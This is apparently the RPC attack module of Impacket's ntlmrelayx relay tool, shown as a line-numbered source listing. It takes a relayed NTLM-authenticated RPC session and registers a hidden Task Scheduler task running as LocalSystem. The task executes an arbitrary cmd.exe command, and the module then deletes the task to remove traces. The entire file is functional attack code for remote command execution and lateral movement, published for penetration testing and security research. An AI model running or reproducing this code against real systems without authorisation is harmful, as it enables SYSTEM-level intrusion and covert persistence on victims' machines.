Hide keyboard shortcuts

Hot-keys on this page

r m x p   toggle line displays

j k   next/prev highlighted chunk

0   (zero) top of page

1   (one) first highlighted chunk

1# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved. 

2# 

3# This software is provided under under a slightly modified version 

4# of the Apache Software License. See the accompanying LICENSE file 

5# for more information. 

6# 

7# Authors: 

8# Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/) 

9# Based on @agsolino and @_dirkjan code 

10# 

11 

12import time 

13import string 

14import random 

15 

16from impacket import LOG 

17from impacket.dcerpc.v5 import tsch 

18from impacket.dcerpc.v5.dtypes import NULL 

19from impacket.examples.ntlmrelayx.attacks import ProtocolAttack 

20 

21PROTOCOL_ATTACK_CLASS = "RPCAttack" 

22 

23class TSCHRPCAttack: 

24 def _xml_escape(self, data): 

25 replace_table = { 

26 "&": "&amp;", 

27 '"': "&quot;", 

28 "'": "&apos;", 

29 ">": "&gt;", 

30 "<": "&lt;", 

31 } 

32 return ''.join(replace_table.get(c, c) for c in data) 

33 

34 def _run(self): 

35 # Here PUT YOUR CODE! 

36 tmpName = ''.join([random.choice(string.ascii_letters) for _ in range(8)]) 

37 

38 cmd = "cmd.exe" 

39 args = "/C %s" % self.config.command 

40 

41 LOG.info('Executing command %s in no output mode via %s' % (self.config.command, self.stringbinding)) 

42 

43 xml = """<?xml version="1.0" encoding="UTF-16"?> 

44<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> 

45 <Triggers> 

46 <CalendarTrigger> 

47 <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> 

48 <Enabled>true</Enabled> 

49 <ScheduleByDay> 

50 <DaysInterval>1</DaysInterval> 

51 </ScheduleByDay> 

52 </CalendarTrigger> 

53 </Triggers> 

54 <Principals> 

55 <Principal id="LocalSystem"> 

56 <UserId>S-1-5-18</UserId> 

57 <RunLevel>HighestAvailable</RunLevel> 

58 </Principal> 

59 </Principals> 

60 <Settings> 

61 <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> 

62 <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> 

63 <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> 

64 <AllowHardTerminate>true</AllowHardTerminate> 

65 <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> 

66 <IdleSettings> 

67 <StopOnIdleEnd>true</StopOnIdleEnd> 

68 <RestartOnIdle>false</RestartOnIdle> 

69 </IdleSettings> 

70 <AllowStartOnDemand>true</AllowStartOnDemand> 

71 <Enabled>true</Enabled> 

72 <Hidden>true</Hidden> 

73 <RunOnlyIfIdle>false</RunOnlyIfIdle> 

74 <WakeToRun>false</WakeToRun> 

75 <ExecutionTimeLimit>P3D</ExecutionTimeLimit> 

76 <Priority>7</Priority> 

77 </Settings> 

78 <Actions Context="LocalSystem"> 

79 <Exec> 

80 <Command>%s</Command> 

81 <Arguments>%s</Arguments> 

82 </Exec> 

83 </Actions> 

84</Task> 

85 """ % (self._xml_escape(cmd), self._xml_escape(args)) 

86 

87 LOG.info('Creating task \\%s' % tmpName) 

88 tsch.hSchRpcRegisterTask(self.dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE) 

89 

90 LOG.info('Running task \\%s' % tmpName) 

91 done = False 

92 

93 tsch.hSchRpcRun(self.dce, '\\%s' % tmpName) 

94 

95 while not done: 

96 LOG.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName) 

97 resp = tsch.hSchRpcGetLastRunInfo(self.dce, '\\%s' % tmpName) 

98 if resp['pLastRuntime']['wYear'] != 0: 

99 done = True 

100 else: 

101 time.sleep(2) 

102 

103 LOG.info('Deleting task \\%s' % tmpName) 

104 tsch.hSchRpcDelete(self.dce, '\\%s' % tmpName) 

105 LOG.info('Completed!') 

106 

107 

108class RPCAttack(ProtocolAttack, TSCHRPCAttack): 

109 PLUGIN_NAMES = ["RPC"] 

110 

111 def __init__(self, config, dce, username): 

112 ProtocolAttack.__init__(self, config, dce, username) 

113 self.dce = dce 

114 self.rpctransport = dce.get_rpc_transport() 

115 self.stringbinding = self.rpctransport.get_stringbinding() 

116 

117 def run(self): 

118 # Here PUT YOUR CODE! 

119 

120 # Assume the endpoint is TSCH 

121 # TODO: support relaying RPC to different endpoints 

122 # TODO: support for providing a shell 

123 # TODO: support for getting an output 

124 if self.config.command is not None: 

125 TSCHRPCAttack._run(self) 

126 else: 

127 LOG.error("No command provided to attack")